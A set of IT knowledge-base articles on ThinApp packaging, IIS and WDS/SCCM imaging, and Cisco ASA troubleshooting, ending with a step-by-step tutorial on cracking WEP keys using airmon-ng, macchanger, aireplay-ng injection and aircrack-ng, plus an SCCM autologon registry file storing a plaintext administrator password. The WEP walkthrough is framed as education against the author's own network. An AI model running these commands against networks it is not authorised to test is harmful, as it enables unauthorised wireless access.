Deploying Applications with VMware ThinApp

KB ID 0000612

Problem

ThinApp is an “Odd” VMware product, insofar as it’s got nothing to do with virtual machines or virtual technology. It’s a product that turns applications into “Stand alone” thin applications, that can be sent to a user and ran without the need for that user to have administrative access, or the need to install anything.

ThinApp was a product called Thinstall that VMware purchased and “re-badged”, you get a free copy with VMware View 5 (Premier Edition). And it ships with a copy of VMware workstation. (Not because it needs a copy, but VMware recommends you use a clean virtual machine to create your ThinApps on).

If you’ve ever used sysdiff in the past or Novell Zenworks for Desktops, you will be familiar with the process, take a ‘scan’ of a clean machine, then install application(s), then carry out another ‘scan’. The software then works out the ‘difference’ and uses that information to build a software package.

In the example below I’m going to create a stand alone version of Google Chrome, that is pre configured, and has Java already installed, and finally deploy that as a single executable file.

Solution

1. It’s recommended that you create your ThinApp on the oldest operating system that it might be deployed on, so here I’m creating a virtual machine in VMware workstation that’s running Windows XP.

2. When built remove any hardware that will not be needed, like the floppy drive, and the USB Controller (Edit > Settings).

3. Installing ThinApp is pretty straightforward, simply run the executable and follow the on screen prompts the only thing to note is; when you enter your licence key, be aware the name you enter will display on the “splash screen” as your ThinApp loads (as shown).

4. Once your reference machine is setup, take a snapshot of it, so you can roll back to this point to create further ThinApps on this clean machine (VM > Snapshot > Take Snapshot).

5. Run the ThinApp Setup Capture > Next > Prescan > This will take a few minutes > When finished simply minimise the window you are finished with it for now. Note: Don’t worry if the application you are installing requires a reboot, ThinApp is clever enough to cope with that.

6. Now install and configure the application you require, in this case Google Chrome. I’m also installing Java, and setting the default homepage to the Google search page.

7. When the application is installed to your liking, maximise (or open the capture if you’ve rebooted) and select ‘Postscan’ > OK.

Note: Before running Postscan make sure you delete any installer files downloaded, any icons from the desktop you do not want deployed in the ThinApp, and empty the recycle bin (you don’t want all that stuff captured, when creating your ThinApp).

8. Make sure only the executable you require is ticked as an entry point > Next > At the Horizon App Manage Page > Next.

9. In a domain environment you can restrict ThinApp access to particular users or groups > Next.

10. Set the isolation mode as required, for most cases it will be ‘Full’ > Next.

11. Select the option to store the sandbox in the user profile > Next > Select whether you want to provide statistics to VMware > Next.

12. You will see this screen ONLY of you are capturing a browser. This is used if you have a particular website that will only run in IE6, or Firefox etc. So that only when URL’s enters listed here are accessed (either directly or from a hyper link) the ThinApp browser will open them, all other URL’s will be opened by the default browser. It’s a cool feature but not one I’m using > Next.

13. Give your ThinApp a name > Next.

14. I’m choosing the option to embed everything into my executable, selecting this may cause a warning about icons, but I ignored and deployed with no problems > Save.

Note: You can use this page to create an MSI file to deploy via group policy if you wish.

15. After ThinApp generates the files it needs > Build.

16. Finish

17. Heres my ThinApp executable file.

18. To test I’ve copied it to a Windows 7 machine.

19. While it’s loading this is what you will see.

20. And here is my ThinApp version of Google Chrome running and pre configured.

Related Articles, References, Credits, or External Links

NA

Creating and Deploying USB Portable Applications with VMware ThinApp

KB ID 0000616 

Problem

The last time I wrote about deploying applications with ThinApp, it was geared towards getting standalone applications onto client PC’s for non admins to run, or putting them in a network share. But if you have a portable application the advantage is you can run it from portable media (Like a USB drive).

Like before I’ll convert Google Chrome to a ThinApp, but the difference is I will set the applications ‘sandbox’ to live in the same location (on the USB). Then I’ll try it out on a different machine.

Solution

1.  It’s recommended that you create your ThinApp on the oldest operating system that it might be deployed on, so here I’m creating a virtual machine in VMware workstation that’s running Windows XP.

2.  When built remove any hardware that will not be needed, like the floppy drive, and the USB Controller (Edit > Settings).

3. Installing ThinApp is pretty straightforward, simply run the executable and follow the on screen prompts the only thing to note is; when you enter your licence key, be aware that the name you enter will display on the “splash screen” as your ThinApp loads.

4. Once your reference machine is setup, take a snapshot of it, so you can roll back to this point to create further ThinApps on this clean machine (VM > Snapshot > Take Snapshot).

5. Run the ThinApp Setup Capture > Next.

6. Prescan > This will take a few minutes > When finished simply minimise the window you are finished with it for now. Note: Don’t worry if the application you are installing requires a reboot, ThinApp is clever enough to cope with that.

7. Now install and configure the application you require, in this case Google Chrome. I’m also installing Java, and setting the default homepage to the Google search page.

8. When the application is installed to your liking, maximise (or open the capture if you’ve rebooted) and select ‘Postscan’ > OK.

Note: Before running Postscan make sure you delete any installer files downloaded, any icons from the desktop you do not want deployed in the ThinApp, and empty the recycle bin (you don’t want all that stuff captured, when creating your ThinApp).

9. Make sure only the executable you require is ticked as an entry point > Next.

10. At the Horizon App Manage Page > Next.

11. In a domain environment you can restrict ThinApp access to particular users or groups > Next.

12. Set the isolation mode as required, for most cases it will be ‘Full’ > Next.

13. As you are storing the App on USB I’d suggest (though you don’t have to) set the application to save its sandbox in the same directory.

14. Select whether you want to provide statistics to VMware > Next.

15. You will see this screen ONLY if you are capturing a browser. This is used if you have a particular website that will only run in IE6, or Firefox etc. So that only when URL’s entered, listed here, are accessed (either directly or from a hyper link) the ThinApp browser will open them, all other URL’s will be opened by the default browser. It’s a cool feature but not one I’m using > Next.

16. Give your ThinApp a name > Next.

17. I’m choosing the option to embed everything into my executable, selecting this may cause a warning about icons, but I ignored and deployed with no problems > Save.

18. After ThinApp generates the files it needs > Build.

19. Finish.

20. Heres my ThinApp executable file.

21. Which I’ve copied to my USB Drive.

22. So when use the drive in another machine.

23. You can simply run the executable.

24. While the app loads it will show a splash screen like this.

25. And should load pre-configured.

 

Related Articles, References, Credits, or External Links

NA

World Wide Web Service Wont Start, Because Windows Process Activation Service Wont Start.

KB ID 0000878

Problem

This problem started when a client attempted to add a ‘distribution point’ for System Center onto the server. This process failed, then Outlook Web Access stopped working. First line found that the World Wide Web service was not running, when they attempted to start it, this happened;

Windows could not start the World Wide Web Publishing Service
service on Local Computer.
Error 1068: The dependency service or group failed to start.

Fair enough, the dependency in question was the Windows Process Activation Service. When they attempted to start that, this happened;

Windows could not start the Windows Process Activation Service
service on Local Computer.
Error 183: Cannot create a file when that file already exists.

Solution

This was a nightmare of a problem to troubleshoot, and IIS architecture is not my subject of choice. I was pretty much convinced the error was in a config file or a setting had been changed but where?

I restored the IIS config files from the servers own backup, and from before the error started, still the services refused to start.

Time to spin up Process Monitor. If you’re unfamiliar with Process Monitor, it is to Windows what Wireshark is to network traffic. Here I’m using it to get a ‘snapshot’ of everything that’s going on when the error occurs.

1. Run Process Monitor > Start it capturing data > Attempt to start the Windows Process Activation Service > Wait for the error > Stop the capture.

2. You will have a LOT of data, so lets narrow it down. On the properties of the service, you can see to launch, it runs ‘svchost.exe -k iissvcs’. Add in the Command Line Column, then add a filter to show only results for that command.

3. Normally at this point you would go through the results column and look for errors, e.g. access denied, not found, etc, but they all looked OK. However it was apparent that it was parsing the WebDAV_schema.xml file as it should, but before it did that, it also was reading WebDAV_schema – Copy.xml.

The copy was ‘moved elsewhere’.

4. At this point, the good folk at Microsoft came back and said they had been thought the applicationHost.config file and the bindings ‘didn’t look right either’. So we took a backup.

5. The bindings for port 80 (http) and 443 (https) were set to the default.

At this point the services could be started without error, and the problem was resolved.

Conclusion

Which of the two changes fixed the problem? The honest answer is “I don’t know”, what I do know is there was nothing I could find on the internet that helped in any way. As I had a backup of the applicationHost.config file I could compare the two see see what Microsoft meant by the bindings ‘not looking right’.

 

Related Articles, References, Credits, or External Links

Kudos to Mark Russinovich and Bryce Cogswell for Process Monitor

WDS Deploying Windows Part 2: Prepare Windows, and Capture to WDS

KB ID 0000737

Problem

In part one we built and configured the WDS Server. Now you need to prepare the reference Windows 8 machine so that you can ‘capture’ its image.

Solution

Before you start, make sure that the machine you are imaging has PLENTY of room on one of its local drive(s), because it copies the image locally, before it sends it to WDS.

Place Your Reference Windows 8 Machine in Audit Mode

To put all the software on your reference machine and configure it how you like, the machine needs to be in ‘Audit Mode’ before you start. There are TWO ways to put the machine into audit mode.

Note: While a machine is in audit mode, it will log on automatically as the Administrator, and every time the machine boots sysprep will launch (in anticipation of you needing it).

Option 1: A Newly Built Machine

1. When you have first built the Windows 8 machine, you will see the screen below, Press CTRL+SHIFT+F3, the machine will automatically reboot and enter audit mode.

Option 2: You Are Already in Windows

2. You can also put a Windows 8 machine into audit mode by running the sysprep executable with the /audit switch.

3. Once in Audit mode, install all the program and configure all the settings you want in your master image. When you are happy run the sysprep program, (Or simply reboot, as sysprep launches at every boot when you are in audit mode).

4. Tick the ‘Generalize’ option, select either shutdown or reboot, (If you choose reboot make sure the machine is ready to pXe boot from the network, and the boot order has the NIC BEFORE the hard drive, or sysprep will start and rebuild the machine before it’s imaged).

5. Sysprep will run, and shutdown or reboot as requested.

6. When the machine boots press F12 to boot from the WDS server.

7. Note: Now you can see why (in part one) we called the boot image ‘Capture an Image’ and the capture ‘Capture an Image’. Select the capture option.

8. WindowsPE will run at the welcome screen > Next,

Note: If the process fails at this point, usually it’s because the network card driver for this machine IS NOT in the boot image.

Adding Drivers to Images on Windows Deployment Services

9. Select the volume that you want to image, (Note: It will NOT be C: that’s reserved, usually it’s D:) > Give the image a name, this is the name you will see in the WDS console, and when you are imaging the target machines > Enter a comment/description > Next.

10. Browse.

11. Navigate to a local drive, and give the image a name with a .wim extension > Save.

12. Tick the box to upload the image > Supply IP/Name of the WDS server > Connect.

13. Supply credentials to log onto the WDS server > OK.

14. Once authenticated you can select the image group we setup in part one > Next.

15. The image will be created on the reference machine.

16. Then it will be uploaded to the WDS Server.

17. When complete click Finish. At this point the reference machine will reboot and rebuild itself.

18. Back in the Windows Deployment Services management console yo will see the image you have just uploaded in your image group.

Note: Sometimes it can take a while to appear, be patient!

Related Articles, References, Credits, or External Links

2012 – WDS Deploying Windows 8 Part 3: Carry Out a Windows 8 Unattended Deployment 2012 – WDS Deploying Windows 8 Part 1: Install and Configure WDS

 

SCCM OSD Capture a Windows 7 Reference Machine

KB ID 0000302 

Problem

You have a reference machine (physical or virtual), and you want to capture an image of that machine to your System Center Configuration Manager 2007 Infrastructure.So you can then deploy that image to multiple machines.

Solution

Prerequisites

1. SCCM needs to be installed and configured.

2. Download the Task and Registry File in Zip Format (Edit the .reg file with notepad to enter the correct administrator password see below).

3. Create a SHARE on your network to hold the images and files > and grant full control to your sccadmin user.

4. Windows and application media that is either “Volume Licensed” or “Multiple Activation Licensed”.

5. Your Windows 7 reference machine needs the local administrators account enabling, and the local administrator’s password changing to mach the password in the registry file you downloaded above. (In the example below Password123).

[box]

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"AutoAdminLogon"="1"
"DefaultUserName"="Administrator"
"DefaultPassword"="Password123"

[/box]

Step 1: SCCM Put your Reference Machine into a Collection

1. Open the SCCM Manager > Expand Site Database > Computer Management > Collections > Right Click > New Collection > Call It “Image Reference Machine” > Next.

2. Next > Click the small computer Icon to add a rule > Next > Change the Resource Class to “System Resource” > Change the attribute name to “Name” > Enter the reference machines Name.

3. Supply the “All systems” Collection > Next.

4. Select your Reference Machine > Next

5. Set the schedule so it occurs 5 minutes in the future > OK > Next > Next > Finish.

6. When finished you should have your Reference Machine in the Collection.

 

Step 2: SCCM Create an “AutoLogon Package”

1. Open the SCCM Manager > Expand Site Database > Computer Management > Software Distribution > Right Click > New > Package > Call it AutoLogon > Next.

2. Tick “This Task contains source files” > Put in the path to share containing the AutoLogon.reg file > Next.

3. Next > Next > Next > Next > Next > Close

4. Expand Your AutoLogon Package > Programs > Right Click > New > Program > Call it “AutoLogon” > In the Command Line Section enter reg import “AutoLogon.reg” > Next.

5. Next > In the Environment Section change the “Program Can Run” Section to “Whether of not a User is Logged on” > Tick Run with Administrative rights > Tick “Runs with UNC Name” > Next.

6. Next > Next > Next > Next > Close.

7. Expand your AutoLogon Package > Distribution Points > Right Click > New Distribution Point > Next > Tick the Server > Next > Close.

8. Extract the AutoLogon.reg file to the location you specified in number 2 above.

 

Step 3: SCCM Import the “Windows 7 Import Task”

1. Extract the Windows7_Capture_Task.xml file to the Desktop.

2. Launch the SCCM Manager > Expand > Site Database > Computer Management > Operating System Deployment > Task Sequences > Right Click > Import > Select the Windows7_Capture_Task.xml from your desktop.

3. You Will be asked if you want to Edit the Task Select Yes > Under “Autologin Via Registry” Select the Package you created in Step 2 above.

4. In the Capture The Reference Machine Section > Set the Network share you want to save the Image in > Set an account (Note user DOMAINNAMEusername) that account MUST have permissions to the network share > Apply > OK.

5. Right Click the Task you have just imported > Properties > Advanced > Tick “Use Boot Image” > Select either the x86 or x64 (to match your reference machine) > Apply > OK.

6. Right Click the Task you have just imported > Advertise > Under Collection Set your “Reference Image Machine” > Next.

7. Next > Next > Next > Next > Close.

 

Step 6: SCCM Send the Boot Media to Distribution

1. Launch the SCCM Manager > Expand > Site Database > Computer Management > Operating System Deployment > Boot Images > Boot Image (x86) > Distribution Points > Right CLick > New Distribution Points > Next.

2. Select the Server share > Next

3. Check the settings > Next.

3. Repeat the above for the Boot Image x64

Step 7: SCCM Create Task Sequence Media

1. Right click the Task you have created > Create Task Sequence Media.

2. Capture Media > Next.

2. Save the ISO image to the network share you created earlier.

 

Step 8: SCCM Perform the Capture

1. Boot Your Windows 7 Reference Machine > Start > Control Panel > Run Advertised Programs > Select “Windows 7 Capture Task” (If it’s not there, reboot and apply the cup of coffee rule) > Run > Yes.

2.The machine will reboot then “Prepare ConfigMgr Client.”

3. Then it will run sysprep.

4. Then it will reboot again, sccm will launch.

5. The Machine will start to capture.

6. Capturing can take a LONG! time

7. When finished the machine will reboot and (because its been sysprepped) will rebuild itself.

8. Your Image file will be in the network share you defined in step xx above with the name you specified in step xx above

 

Related Articles, References, Credits, or External Links

Install SCCM 2007 on Windows

Server 2008 R2 – Step by Step

SCCM 2007 Initial Setup and Configuration

Cisco ASA – I Cannot Ping External Addresses? (Troubleshooting ICMP)

KB ID 0000914 

Problem

Considering we use ICMP to test connectivity, the fact that it is not a stateful protocol can be a major pain! Last week one of my colleagues rang me up and said, “Can you jump on this firewall, I’ve got no comms, and I cant ping external IP addresses. I can ping the internet from the firewall and I can ping internal IP addresses form the firewall”.

Solution

1. Before we start, lets get the basics out of the way, does the client you are pinging from have a firewall turned on? Can you ping the inside interface of the firewall?

2. Pinging will never work unless you have ICMP inspection turned on on the firewall. See the following article.

Cisco Firewalls and PING

Using Packet-Tracer to Test Ping/ICMP

3. At this point we troubleshoot as we would for any other traffic through the firewall. To do this we use packet-tracer, the syntax is slightly different for ICMP, than it is for TCP and UDP though. We need to specify an ICMP Type and an ICMP code, to make sure the traffic leaves the firewall we trace ICMP type 8 (echo), with ICMP code 0 (none). And ICMP type 0 (Echo-reply), with ICMP code 0 (none), for traffic inbound.

ICMP Types and Codes

[box]

Test Outbound Ping

Petes-ASA# packet-tracer input inside icmp 192.168.1.1 8 0 4.2.2.2

Testing Inbound Ping (where 123.123.123.123 is the public IP you are mapped to)

Petes-ASA# packet-tracer input outside icmp 4.2.2.2 0 0 123.123.123.123

[/box]

Note: You need to use the public addresses or this will happen.

4. Make sure the client you are on is getting NATTED or PATTED through the firewall. Below we will assume my internal IP address is 192.168.1.1.

Note: If you have names enabled and 192.168.1.1 has a name, you will get no results! issue a no names command from configure terminal mode to check.

[box]

Petes-ASA# show xlate | incl 192.168.1.1

If this machine was being NATTED to another public IP address it would look like..

NAT from inside:192.168.1.1 to outside:123.123.123.124

If this machine was being PATTED to a public IP address it would look like..

ICMP PAT from inside:192.168.1.1/1 to outside:123.123.123.123/1 flags ri idle 0:00:07 timeout 0:00:30

[/box]

If it fails at this stage then check you network translation configuration on the firewall.

5. If all appears normal so far you can capture the traffic as it passes though the firewall, below I’m successfully capturing the ICMP traffic though the firewall.

[box]

Petes-ASA# configure terminal
Petes-ASA(config)# capture capout interface inside match icmp host 192.168.1.1 any
Petes-ASA(config)# capture capin interface outside match icmp host 4.2.2.2 any

At this point attempt to ping, so some traffic is captured

Petes-ASA(config)# show capture capout

8 packets captured

1: 12:56:51.089244 192.168.1.1 > 4.2.2.2: icmp: echo request
2: 12:56:51.104410 4.2.2.2 > 192.168.1.1: icmp: echo reply
3: 12:56:52.092829 192.168.1.1 > 4.2.2.2: icmp: echo request
4: 12:56:52.108926 4.2.2.2 > 192.168.1.1: icmp: echo reply
5: 12:56:53.098688 192.168.1.1 > 4.2.2.2: icmp: echo request
6: 12:56:53.113809 4.2.2.2 > 192.168.1.1: icmp: echo reply
7: 12:56:54.105463 192.168.1.1 > 4.2.2.2: icmp: echo request
8: 12:56:54.120263 4.2.2.2 > 192.168.1.1: icmp: echo reply

Petes-ASA(config)# show capture capin

8 packets captured

1: 12:57:28.170981 123.123.123.123 > 4.2.2.2: icmp: echo request
2: 12:57:28.185949 4.2.2.2 > 123.123.123.123: icmp: echo reply
3: 12:57:29.175238 123.123.123.123 > 4.2.2.2: icmp: echo request
4: 12:57:29.190084 4.2.2.2 > 123.123.123.123: icmp: echo reply
5: 12:57:30.180212 123.123.123.123 > 4.2.2.2: icmp: echo request
6: 12:57:30.195500 4.2.2.2 > 123.123.123.123: icmp: echo reply
7: 12:57:31.186101 123.123.123.123 > 4.2.2.2: icmp: echo request
8: 12:57:31.201680 4.2.2.2 > 123.123.123.123: icmp: echo reply
8 packets shown

[/box]

Note: If your capout capture looks like the following, then you didn’t have inspect icmp enabled on your policy-map.

[box]

Petes-ASA(config)# show capture capout

4 packets captured

1: 13:02:33.285309 192.168.1.1 > 4.2.2.2: icmp: echo request
2: 13:02:37.886596 192.168.1.1 > 4.2.2.2: icmp: echo request
3: 13:02:42.886672 192.168.1.1 > 4.2.2.2: icmp: echo request
4: 13:02:47.888198 192.168.1.1 > 4.2.2.2: icmp: echo request
4 packets shown

[/box]

How Do I Clear or Delete a Cisco ASA Capture?

[box]

To clear a Capture, but leave it running;

Petes-ASA(config)# clear capture capin
Petes-ASA(config)# clear capture capout
Petes-ASA(config)# show capture capin

0 packet captured

0 packet shown
Petes-ASA(config)# show capture capout

0 packet captured

0 packet shown

To Delete a Capture;

Petes-ASA(config)# no capture capout
Petes-ASA(config)# no capture capin  

[/box]

Related Articles, References, Credits, or External Links

Cisco Firewalls and PING

Cisco ASA 5500 Allowing Tracert

 

Cisco ASA – ‘Prove it’s Not The Firewall!’

KB ID 0001049 

Problem

Yeah, it’s funny because it’s true! The article title might not sound like the most professional approach, but when the ‘Well it’s not working now’ finger gets pointed at the ‘firewall guy/girl’, they need to ascertain two things;

1. Is the problem actually the firewall, if not then help the frustrated party track down the actual problem.

2. If your problem IS the firewall, fix it!

I’m just coming out of a major network greenfield site build, all the individual technologies that have been getting planned and designed are now starting to come online and require comms though the firewall solution that I’ve been working on. So my days are pretty much filled with conversations like this;

Consultant/Engineer: Pete I need some ports opening on the firewall.
Me: OK let me know the IP addresses, host-names, ports, protocols etc, and I’ll open them for you.
I then open the requested ports/protocols.
Consultant/Engineer: You know those ports you opened? They don’t work.

At this point one of the following has occurred;

1. I’ve made an error, (it happens I’m human), I might have entered the wrong information, or not applied an ACL, or put the rule on the wrong firewall. Always assume you have done something wrong, until you are 100% sure that’s not the case.

2. The person who asked for traffic to be allowed, asked for the wrong thing, either they didn’t RTFM, or someone has given them the wrong IP addresses, or because they are human too, they’ve made a mistake.

3. The traffics not even getting to the firewall, because either it’s getting blocked before it gets to you, or there is a routing problem stopping the traffic hitting the firewall. (Remember routing works by Unicorns and Magic, so routing people are not to be trusted!)

4. The traffic needs some kind of special inspection to work through the firewall i.e. ICMP, FTP, or PPTP etc.

5. Some annoying bug in the ASA code is stopping you, which either requires a lot of Internet and forum searching or a call to TAC to confirm.

If I’ve forgotten another reason – feel free to contact me. (Link at the bottom of the page).

Solution

Step 1: Make sure you are not blocking the Traffic

Packet tracer is your friend! Use it to simulate traffic going though the firewall, and the firewall will tell you what it will do with that traffic. I prefer to use command line, but you can also run packet tracer graphically in the ASDM.

Packer Tracer Graphically

1. From the ASDM > Tools Packet Tracer.

2. Enter the details and click start, if the firewall is blocking the traffic this should tell you where and why.

Packer-Tracer From Command Line (v 7.21 and upwards)

Syntax

[box]packet-tracer input source_interface protocol source_address source_port destination_adress destination_port [detailed] [xml] [/box]

Syntax Description

  • Source_interface: Specifies the source interface name for the packet trace.
  • Protocol: Protocol type for the packet trace. e.g. icmp, tcp, or udp.
  • Source_address: The IP address for the host thats sending the traffic to be tested.
  • Source_port: Source port (can be and random port usually it’s the destination port that’s usually important).
  • Destination_address: The IP address for the host that traffic is being sent to.
  • Destination_port: The port that you are testing.
  • Detailed: (Optional) Provides detailed packet trace information.
  • Xml: (Optional) Displays the trace capture in XML format.

Example

Below I’m checking that an internal host (10.254.254.5) can get access to a public web server (123.123.123.123) via http (TCP port 80). Note: As mentioned above I just picked a random source port (1024).

OK, so if packet-tracer shows the firewall is not blocking the traffic. Then either there’s other ports we don’t know about that may need opening, or the traffic is not getting to the firewall. Normally at this point I’d test to see if the traffic is getting to the firewall. To do that I would do a packet capture.

To demonstrate, below someone has requested that we open https from Server A on our LAN, to an Internet server Server B.

 

[box]

Petes-ASA# configure terminal
Petes-ASA(config)# capture capout interface inside match tcp host 10.0.0.1 host 123.123.123.123 eq 443

[/box]

Send some traffic!

[box] Petes-ASA(config)# show capture capout

0 packet captured

0 packet shown
Petes-ASA(config)#

[/box]

Above the traffic is not getting to the firewall as there’s a problem between Server A and the Firewall, either something is blocking the traffic downstream, or Server A cannot route traffic to the firewall.

Below we can see traffic hitting the firewall, in fact 10.0.0.1 sends out three packets on TCP port 443 (https). What we CANNOT SEE is any traffic coming back, in this case Server B is not replying to us, either its down or it cannot route traffic back to us.

[box] Petes-ASA(config)# show capture capout

3 packets captured

1: 20:28:47.165976 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
2: 20:28:50.214649 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
3: 20:28:56.168951 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
3 packets shown
Petes-ASA(config)#

[/box]

Here is an example of what you should see;

[box]Petes-ASA(config)# show capture capout

11 packets captured

1: 20:34:49.575806 10.0.0.1.1063 > 123.123.123.123.443: S 4084340501:4084340501(0) win 64240 <mss 1460,nop,nop,sackOK>
2: 20:34:49.576828 123.123.123.123.443 > 10.0.0.1.1063: S 4235939008:4235939008(0) ack 4084340502 win 64240 <mss 1380,nop,nop,sackOK>
3: 20:34:49.577820 10.0.0.1.1063 > 123.123.123.123.443: . ack 4235939009 win 64240
4: 20:34:49.578812 10.0.0.1.1063 > 123.123.123.123.443: P 4084340502:4084340579(77) ack 4235939009 win 64240
5: 20:34:49.582825 123.123.123.123.443 > 10.0.0.1.1063: P 4235939009:4235940127(1118) ack 4084340579 win 64163
6: 20:34:49.583816 10.0.0.1.1063 > 123.123.123.123.443: P 4084340579:4084340761(182) ack 4235940127 win 63122
7: 20:34:49.584823 123.123.123.123.443 > 10.0.0.1.1063: P 4235940127:4235940170(43) ack 4084340761 win 63981
8: 20:34:49.804783 10.0.0.1.1063 > 123.123.123.123.443: . ack 4235940170 win 63079
9: 20:35:20.378322 10.0.0.1.1063 > 123.123.123.123.443: F 4084340761:4084340761(0) ack 4235940170 win 63079
10: 20:35:20.379344 123.123.123.123.443 > 10.0.0.1.1063: . ack 4084340762 win 63981
11: 20:35:20.379405 123.123.123.123.443 > 10.0.0.1.1063: R 4235940170:4235940170(0) ack 4084340762 win 0
11 packets shown
Petes-ASA(config)#

[/box]

Now the port(s) we want to allow, we can see are actually working, so if theres still a problem, theres probably another port / protocol that’s being blocked. To find out we need to enable logging and see if any packets are being denied.

[box]Petes-ASA#configure terminal
Petes-ASA(config)# logg buffer-size 4096
Petes-ASA(config)# logg buffered 7
Petes-ASA(config)# logg on [/box]

Try the connection again, then view the log, (here I’m filtering it on 10.0.0.1, as the log can be quite sizable);

[box]Petes-ASA(config)# show logg | incl 10.0.0.1
%ASA-7-609001: Built local-host inside:10.0.0.1
%ASA-6-302013: Built outbound TCP connection 15 for outside:123.123.123.123/443 (123.123.123.123/443) to inside:10.0.0.1/1070 (10.0.0.1/1070)
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group “outbound” [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group “outbound” [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group “outbound” [0x0, 0x0]

%ASA-6-302014: Teardown TCP connection 15 for outside:123.123.123.123/443 to inside:10.0.0.1/1070 duration 0:00:30 bytes 1420 TCP FINs
%ASA-7-609002: Teardown local-host inside:10.0.0.1 duration 0:00:30
Petes-ASA(config)# [/box]

As we can see traffic is being denied and it’s on TCP port 21 (That’s FTP if your interested). So let’s open that port, and try again;

[box]Petes-ASA(config)# show logg | incl 10.0.0.1
%ASA-5-111008: User ‘enable_15’ executed the ‘access-list outbound extended permit tcp host 10.0.0.1 host 123.123.123.123 eq 21’ command.
%ASA-5-111010: User ‘enable_15’, running ‘CLI’ from IP 0.0.0.0, executed ‘access-list outbound extended permit tcp host 10.0.0.1 host 123.123.123.123 eq 21’
%ASA-7-609001: Built local-host inside:10.0.0.1
%ASA-6-302013: Built outbound TCP connection 16 for outside:123.123.123.123/443 (123.123.123.123/443) to inside:10.0.0.1/1077 (10.0.0.1/1077)
%ASA-6-302013: Built outbound TCP connection 17 for outside:123.123.123.123/21 (123.123.123.123/21) to inside:10.0.0.1/1080 (10.0.0.1/1080)
%ASA-6-302014: Teardown TCP connection 16 for outside:123.123.123.123/443 to inside:10.0.0.1/1077 duration 0:00:30 bytes 1420 TCP FINs
Petes-ASA(config)# [/box]

And we are working!

If we have got this far and you are still not working, then check the traffic you are trying to send does not need any special inspection enabling. Or the port number you are using may have been reserved for a particular type of traffic (like this).

Failing that, upgrade the ASA, then open a TAC call.

Related Articles, References, Credits, or External Links

NA

 

Hacking Wireless WEP Keys with BackTrack and Aircrack-ng

KB ID 0000633

Problem

Disclaimer: This article is for educational purposes only. Having the ability to pick a lock does not make you a thief. The main thing to take away from this article is, “DONT secure your wireless network with WEP“.

WEP, has been around for a long time now, its limited to an alpha numeric password, 0-9 and A-F (because its in hexadecimal), the password can be 40, 64 or 126 bits long. The flaw is, each bit of information is encrypted with the SAME key, If you can get enough packets (24 bit long packets called IV’s), you can mathematically work out what the key is.

Solution

To do this I’m going to use BackTrack 5 (R1) installed in a Virtual machine, the Network card I’m using is an ALFA AWUS036NH USB wireless card, I’m using this card because the Ralink RT2878/3078 chipset that’s inside it just works with airmon-ng, without the need to patch drivers or mess about.

Note: If your wireless card does not work please do not email me go the the Aircrack-ng forums.

1. After I’ve plugged the wireless card into the host machine, I’m going to present it to the virtual machine. VM > Removable Devices > Ralink 802.11 n WLAN > Connect.

2. To make sure BackTrack can see the card issue the following command;

[box] airmon-ng [/box]

Take note of the interface name (in the example below it’s wlan0). Then to change the MAC address of the card we are going to ‘spoof’ a false MAC address of 00:11:22:33:44:55 with the following commands. (Note: Your interface may not be wlan0, change accordingly);

[box]airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan[/box]

Then to scan and see what networks the card can see issue the following command

[box] airodump-ng wlan0 [/box]

3. Airodump will continue to scan until you press CTRL+C. When you see the target network, take a note of its BSSID and its channel number. My target below is called PeteNetLive and the bssid is 00:16:B6:B4:66:46 and its on channel 1).

4. Now scan the target network with the following command;

[box]SYNTAX
airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)
EXAMPLE
airodump-ng -c 1 -w PeteNetLive –bssid 00:16:B6:B4:66:46 wlan0[/box]

5. Leave that running, and open a new terminal window, execute the following command in the new window;

[box]SYNTAX
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
EXAMPLE
aireplay-ng -1 0 -a 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 -e PeteNetLive wlan0[/box]

YOU NEED it to say ‘Authentication successful‘.

6. To throw some traffic across the network issue the following command;

[box]SYNTAX
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
EXAMPLE
aireplay-ng -3 -b 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 wlan0[/box]

Note: ‘-3’ denotes a client attack, if your data packets do not rise (you will understand in a minute), then try with ‘-4’ instead.

7. Back in the original terminal window the Data count should start to rise, do nothing further until its over 10,000 (that’s 10,000 IVs captured).

Reality Check!: In most tutorials (including my video above) this is a nice painless process, it relies on there being a decent quality signal, the router/access point not crashing because you are ‘battering’ it, and there being lots of healthy traffic around. You can get enough data packets without the ‘aireplay-ng -3’ command, but it will take a lot longer. You can stop and start the forcing of traffic by pressing CTRL+C, and then executing the command again (it just appends the data to the capture file). In this example I used about five attempts (the router froze and needed to be rebooted). So this is not a quick process. Someone passively attacking your wireless will need lot of patience. This took about an hour and I was right next to the router, and I rebooted it every time it locked up, (which I saw because the Data figure suddenly stopped rising).

8. In the example below I’m now over 10,000 IV’s captured, and I’ve stopped forcing traffic (CTRL+C).

9. By default your capture will be in your home folder, and it will be called filename-01.cap (where filename is the name you used in step 4).

10. To crack the key execute the following command;

[box]SYNTAX
aircrack-ng -b (bssid) (file name-01.cap)
EXAMPLE
aircrack-ng -b 00:16:B6:B4:66:46 PeteNetLive-01.cap[/box]

11. It will display the WEP key with colons in it, remove them,

DC:B4:2F:63:C9 = DCB42F63C9 <-Heres the WEP key!

12. And to prove it’s correct.

13. And to prove I didn’t just print a sticker, heres the web console of the router.

Related Articles, References, Credits, or External Links

Installing the BackTrack Linux VMware Virtual Machine

Windows – Export / Recover WEP and WPA Wireless Keys